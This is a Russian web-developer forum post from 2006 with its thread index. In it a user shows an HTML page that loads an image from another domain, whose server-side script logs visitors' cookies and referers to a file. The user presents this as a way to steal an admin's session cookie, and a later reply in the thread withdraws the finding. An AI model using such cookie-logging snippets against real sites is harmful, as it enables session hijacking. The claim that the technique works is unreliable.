попробовал - работает. ахренеть...

Misha v.3 13.03.2006 21:46

2PAF. подробности:

на сайте_1 создал файл /_t_security.html:

<html>
<body>
<img src="http://сайт_2/_t_img.html" width="100" height="100" />
</body>
</html>

на сайте_2 (в другом домене) создал файл /_t_img.html содержания:

<html>
<body>
$str[^dtf:format[%Y-%m-%d %T]	$env:HTTP_REFERER	$cookie:[auth.name]^#0A]
^str.save[append;/../data/cookie.log]
</body>
</html>

при открытии http://сайт_1/_t_security.html в любом моем броузере Opera 9, IE 5.5, FF 1.5.0.2 наблюдаю в cookie.log значение куки.

т.е. зная какую куку красть (например auth.sid/auth.uid для наших сайтов или какую-то там для того-же phpbb) можно украв куку админа зайти под ним (в опере я могу прямо ручками куку отредактировать)...

всю жизнь считал что броузер пошлет куки только если запрошен элемент в том-же домене, ан нет... грустно.

Антиспам - антискрипт, TLoD,Snake 10.03.2006 16:58
- растолкуйте дураку, где тут собака-то?, Александр Петросян (PAF) [M] 11.03.2006 23:26 / 11.03.2006 23:28
- даже если там не Javascript, Sergey M. 11.03.2006 14:37
  - С внешним редиректом можно подробней?, TLoD,Snake 12.03.2006 20:06
    - есть статья про это дело, Sergey M. 12.03.2006 21:08
      - класс! всем рекомендую пойти и почитать, Александр Петросян (PAF) [M] 14.03.2006 22:46
        проверка форума, R. Averkov [M] 15.03.2006 08:42 / 15.03.2006 08:42
- Ответ, pa1n 10.03.2006 17:21
  - Очень "мудро", Sanja v.2 [M] 10.03.2006 17:48 / 10.03.2006 17:50
    - попробовал - работает. ахренеть..., Misha v.3 [M] 13.03.2006 21:46
      - отбой, ни фига не передается :), Misha v.3 [M] 14.03.2006 14:35
      - пришел спам, Denis Arkhipov 14.03.2006 13:39
        это-то тут причем? спамили всегда. (-), Misha v.3 [M] 14.03.2006 13:46
      - Пора в путь-дорогу..., AleXp 13.03.2006 23:23 / 13.03.2006 23:24
      - А вот другой тип:, Sanja v.2 [M] 13.03.2006 22:49 / 13.03.2006 22:52
      - http://en.wikipedia.org/wiki/XSS#Type_2 (-), Sanja v.2 [M] 13.03.2006 22:33
    - Большое спасибо за открытие глаз (-), R. Averkov [M] 11.03.2006 03:09
    - Ответ, pa1n 10.03.2006 19:10
- Ответ, Sanja v.2 [M] 10.03.2006 17:10
  - Как бы это пользователям объяснить, TLoD,Snake 10.03.2006 22:15
    - из мира HTML, TLoD,Snake 10.03.2006 23:42
      - Загляните в спецификацию HTML, G_Z [M] 11.03.2006 00:27
        Может как еще извернуться?, TLoD,Snake 11.03.2006 14:02
    - тогда придумавайте другие объяснения:, Misha v.3 [M] 10.03.2006 23:24
- ^try{^image::measure[]}{Вася хакер}, R. Averkov [M] 10.03.2006 17:07 / 10.03.2006 17:07
  - Ответ, TLoD,Snake 10.03.2006 22:13

Новости	FAQ	Авторы	Документация	В действии	Библиотека
Инструменты	Полезные ссылки	Хостинги	Скачать	Примеры	Форум